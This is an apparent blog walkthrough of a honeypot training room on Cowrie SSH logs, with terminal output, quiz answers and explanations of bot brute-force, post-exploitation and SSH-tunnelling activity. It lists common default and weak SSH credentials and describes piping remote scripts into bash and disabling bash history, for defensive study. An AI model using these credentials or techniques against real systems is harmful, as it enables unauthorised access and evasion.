     * Support:        https://ubuntu.com/advantage
    
      System information as of Mon Oct 11 04:04:00 UTC 2021
    
      System load:  0.18              Processes:           91
      Usage of /:   27.3% of 8.79GB   Users logged in:     0
      Memory usage: 41%               IP address for eth0: 10.10.81.52
      Swap usage:   0%
    
    
    0 updates can be applied immediately.
    
    
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    demo@acmeweb:~$ whoami
    demo
    demo@acmeweb:~$ #www.hackingtruth.in
    demo@acmeweb:~$ 
     
      



    Note: You may need to delete the demo machine's identity from .ssh/known_hosts as it will differ from the one used in the honeypot. You will also need to specify a port adding -p 1400 to the SSH command. The logs will also be found at /home/cowrie/honeypot/var/log/cowrie






    demo@acmeweb:~$ ls
    BotCommands  Top200Creds.txt  Tunnelling
    demo@acmeweb:~$ cat Top200Creds.txt
    /root/1234/
    /root/gm8182/
    /root/Admin123/
    /root/cisco/
    /pi/raspberry/
    /user/user/
    /root/abc123/
    /pi/raspberryraspberry993311/
    /user/1234/
    /root/test/
    /root/elite/
    /ftpadmin/ftpadmin/
    /default//
    /admin/11/
    demo@acmeweb:~$ 
    demo@acmeweb:~$ cd /home/cowrie/honeypot/var/log/cowrie
    demo@acmeweb:/home/cowrie/honeypot/var/log/cowrie$ ls
    audit.log  cowrie.json  cowrie.json.2021-09-23
    demo@acmeweb:/home/cowrie/honeypot/var/log/cowrie$ 
    
    
    



    Attacks Against SSH


    SSH and Brute-Force Attacks


    By default, Cowrie will only expose SSH. This means adversaries will only be able to compromise the honeypot by attacking the SSH service. The attack surface presented by a typical SSH installation is limited so most attacks against the service will take the form of brute-force attacks. Defending against these attacks is relatively simple in most cases as they can be defeated by only allowing public-key authentication or by using strong passwords. These attacks should not be completely ignored, as there are simply so many of them that you are pretty much guaranteed to be attacked at some point.

    A collection of the 200 most common credentials used against old Cowrie deployments has been left on the demo machine and can be used to answer the questions below. As you can see, most of the passwords are extremely weak. Notable entries include the default credentials used for some devices like Raspberry PIs and the Volumio Jukebox. Various combinations of '1234' and rows of keys are also commonplace.



    1) How many passwords include the word "password" or some other variation of it e.g "p@ssw0rd" 

    HINT - This regular expression works "p.*ss.*". You can also count lines by piping to wc -l

    Ans - 15




    demo@acmeweb:~$ 
    demo@acmeweb:~$ ls
    BotCommands  Top200Creds.txt  Tunnelling
    demo@acmeweb:~$ 
    demo@acmeweb:~$ grep "p.*ss" Top200Creds.txt
    /admin/password/
    /root/password1/
    /root/password/
    /user1/password/
    /MikroTik/password/
    /default/password/
    /admin1/password/
    /profile1/password/
    /user/password/
    /admin/passw0rd/
    /admin1/passw0rd/
    /user1/passw0rd/
    /profile1/passw0rd/
    /MikroTik/passw0rd/
    /default/passw0rd/
    demo@acmeweb:~$ 
    demo@acmeweb:~$ 
    demo@acmeweb:~$ ls
    BotCommands  Top200Creds.txt  Tunnelling
    demo@acmeweb:~$ 
    demo@acmeweb:~$ grep "p.*ss" Top200Creds.txt | wc -l
    15
    demo@acmeweb:~$ 
    
    
    



    2) What is arguably the most common tool for brute-forcing SSH?

    Ans - hydra


    3) What intrusion prevention software framework is commonly used to mitigate SSH brute-force attacks?

    Ans -






    Typical Bot Activity


    Typical Post Exploitation Activity


    The majority of attacks against typical SSH deployments are automated in some way. As a result, most of the post-exploitation activity that takes place after a bot gains initial access to the honeypot will follow a broad pattern. In general, most bots will perform a combination of the following:


    Perform some reconnaissance using the uname or nproc commands or by reading the contents of files like /etc/issue and /proc/cpuinfo. It's possible to change the contents of all these files so the honeypot can pretend to be a server or even an IoT toaster.

    Install malicious software by piping a remote shell script into bash. Often this is performed using wget or curl though, bots will occasionally use FTP. Cowrie will download each unique occurrence of a file but prevent the scripts from being executed. Most of the scripts tend to reference cryptocurrency mining in some way.

    A more limited number of bots will then perform some anti-forensics tasks by deleting various logs and disabling bash history. This doesn't affect Cowrie since all the actions are logged externally.

    Bots are not limited to these actions in any way and there is still some variation in the methods and goals of bots. Run through the questions below to further understand how adversaries typically perform reconnaissance against Linux systems.





    1) What CPU does the honeypot "use"?

    Ans -



    2) Does the honeypot return the correct values when uname -a is run? (Yay/Nay)

    Ans -



    3) What flag must be set to pipe wget output into bash?

    Ans -


    4) How would you disable bash history using unset?

    Ans -




     
     

    Identification Techniques


    Bot Identification


    It is possible to use the data recorded by Cowrie to identify individual bots. The factors that can identify traffic from individual botnets are not always the same. However, some artifacts tend to be consistent across bots including, the IP addresses requested by bots and the specific order of commands. Identifiable messages may also be present in scripts or commands though this is uncommon. Some bots may also use highly identifiable public SSH keys to maintain persistence.


    It's also possible to identify bots from the scripts that are downloaded by the honeypot, using the same methods that would be used to identify other malware samples.


    Take a look at the samples included with the demo machine and answer the below questions.


    Note: Don't run any of the commands found in the samples as you may end up compromising whatever machine that runs them!






    1) What brand of device is the bot in the first sample searching for? (BotCommands/Sample1.txt)

    Ans -



    2) What are the commands in the second sample changing? (BotCommands/Sample2.txt)

    Ans -



    3) What is the name of the group that runs the botnet in the third sample? (BotCommands/Sample3.txt)

    Ans -




    SSH Tunnelling


    Attacks Performed Using SSH Tunnelling


    Some bots will not perform any actions directly against honeypot and instead will leverage a compromised SSH deployment itself. This is accomplished with the use of SSH tunnels. In short, SSH tunnels forward network traffic between nodes via an encrypted tunnel. SSH tunnels can then add an additional layer of secrecy when attacking other targets as third parties are unable to see the contents of packets that are forwarded through the tunnel. Forwarding via SSH tunnels also allows an adversary to hide their true public IP in much the same way a VPN would.


    The IP obfuscation can then be used to facilitate schemes that require the use of multiple different public IP addresses like, SEO boosting and spamming. SSH tunnelling may also be used to by-parse IP-based rate limiting tools like Fail2Ban as an adversary is able to transfer to a different IP once they have been blocked.




    SSH Tunnelling Data in Cowrie


    By default, Cowrie will record all of the SSH tunnelling requests received by the honeypot but, will not forward them on to their destination. This data is of particular importance as it allows for the monitoring and discovery of web attacks, that may not have been found by another honeypot. I've included a couple of samples sort of data that can be recorded from SSH tunnels.

    Note: Some elements have been redacted from the samples to protect vulnerable servers.





    1) What application is being targetted in the first sample? (Tunnelling/Sample1.txt)

    Ans -



    2) Is the URL in the second sample malicious? (Tunnelling/Sample2.txt) (Yay/Nay)

    Ans -








    Recap and Extra Resources


    Recap


    I hope this room has demonstrated how interesting honeypots can be and how the data that we can collect from them can be used to gain insight into the operations of botnets and other malicious actors.



    Extra Resources


    I've included some extra resources to assist in learning more about honeypots below:


        Awesome Honeypots - A curated list of honeypots
        Cowrie - The  SSH honeypot used in the demo
        Sending Cowrie Output to ELK - A good example of how to implement live log monitoring
       

    I would also recommend that you deploy a honeypot yourself as it's a great way to learn. Deploying a honeypot is also a great way to understand how to work with cloud providers since external honeypots are best when deployed to the cloud. Deploying and managing multiple honeypots is also an interesting challenge and a good way to gain practical experience with tools like Ansible.





    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal




  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.